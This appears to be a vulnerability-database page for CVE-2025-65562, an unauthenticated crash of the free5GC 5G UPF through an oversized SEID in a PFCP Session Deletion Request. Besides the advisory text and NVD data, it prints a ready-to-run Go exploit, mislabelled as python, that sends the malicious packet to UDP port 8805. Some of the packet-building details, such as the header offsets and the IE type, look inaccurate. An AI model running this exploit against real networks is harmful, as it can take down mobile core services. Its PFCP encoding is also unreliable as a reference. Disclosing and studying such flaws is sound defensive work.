Security Vulnerability Report
中文
CVE-2025-65562 CVSS 7.5 HIGH

CVE-2025-65562

Published: 2025-12-18 19:16:34
Last Modified: 2026-01-07 21:01:21
Source: [email protected]

Description

The free5GC UPF suffers from a lack of bounds checking on the SEID when processing PFCP Session Deletion Requests. An unauthenticated remote attacker can send a request with a very large SEID (e.g., 0xFFFFFFFFFFFFFFFF) that causes an integer conversion/underflow in LocalNode.DeleteSess() / LocalNode.Sess() when a uint64 SEID is converted to int and used in index arithmetic. This leads to a negative index into n.sess and a Go runtime panic, resulting in a denial of service (UPF crash). The issue has been reproduced on free5GC v4.1.0 with crashes observed in the session lookup/deletion path in internal/pfcp/node.go; other versions may also be affected. No authentication is required.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:free5gc:free5gc:4.1.0:*:*:*:*:*:*:* - VULNERABLE
free5GC < 4.1.0
free5GC UPF v4.1.0(确认受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-65562 PoC - free5GC UPF SEID Integer Underflow // This PoC sends a PFCP Session Deletion Request with a malicious large SEID package main import ( "encoding/binary" "fmt" "net" ) // PFCP Header Structure type PFCPHeader struct { Version uint8 Flag uint8 MessageType uint8 MessageLength uint16 SequenceNumber uint32 Seid uint64 } func createPFCPHeader(msgType uint8, seid uint64, seqNum uint32) []byte { header := make([]byte, 16) // Version (3 bits) + Flags (5 bits) header[0] = 0x20 // Version 1 header[1] = msgType // Message Length (will be set later) binary.BigEndian.PutUint16(header[2:4], 0x0000) // Sequence Number (3 bytes) binary.BigEndian.PutUint32(header[4:8], seqNum) // SEID binary.BigEndian.PutUint64(header[8:16], seid) return header } func createSessionDeletionRequest(seid uint64) []byte { // Create PFCP Session Deletion Request header header := createPFCPHeader(0x1D, seid, 0x000001) // Add IE (Information Element) - Cause ie := []byte{ 0x00, 0x02, // IE Type: Cause 0x00, 0x05, // IE Length 0x00, // Spare 0x10, // Cause: Delete (request to delete session) 0x00, 0x00, 0x00 // Spare } message := append(header, ie...) // Update message length binary.BigEndian.PutUint16(message[2:4], uint16(len(message)-4)) return message } func main() { fmt.Println("CVE-2025-65562 PoC - free5GC UPF SEID Integer Underflow") fmt.Println("Target: free5GC UPF PFCP endpoint (usually port 8805)") // Malicious SEID that causes integer underflow // 0xFFFFFFFFFFFFFFFF will be converted to -1 when cast to int maliciousSeid := uint64(0xFFFFFFFFFFFFFFFF) fmt.Printf("Using malicious SEID: 0x%016X\n", maliciousSeid) fmt.Printf("This SEID will underflow to index: %d\n", int(maliciousSeid)) // Create the malicious packet packet := createSessionDeletionRequest(maliciousSeid) fmt.Printf("Sending %d bytes to target...\n", len(packet)) // Connect to UPF (adjust target IP/port as needed) conn, err := net.DialUDP("udp", nil, &net.UDPAddr{ IP: net.ParseIP("127.0.0.1"), Port: 8805, }) if err != nil { fmt.Printf("Connection error: %v\n", err) return } defer conn.Close() // Send the malicious packet _, err = conn.Write(packet) if err != nil { fmt.Printf("Send error: %v\n", err) return } fmt.Println("Malicious packet sent successfully!") fmt.Println("Expected result: UPF panic and crash due to negative array index") }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65562", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:33.747", "lastModified": "2026-01-07T21:01:21.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The free5GC UPF suffers from a lack of bounds checking on the SEID when processing PFCP Session Deletion Requests. An unauthenticated remote attacker can send a request with a very large SEID (e.g., 0xFFFFFFFFFFFFFFFF) that causes an integer conversion/underflow in LocalNode.DeleteSess() / LocalNode.Sess() when a uint64 SEID is converted to int and used in index arithmetic. This leads to a negative index into n.sess and a Go runtime panic, resulting in a denial of service (UPF crash). The issue has been reproduced on free5GC v4.1.0 with crashes observed in the session lookup/deletion path in internal/pfcp/node.go; other versions may also be affected. No authentication is required."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:free5gc:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4087E419-65F0-4AAD-A2F6-C24EEDC27B3B"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/issues/731", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/free5gc/free5gc/issues/731", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.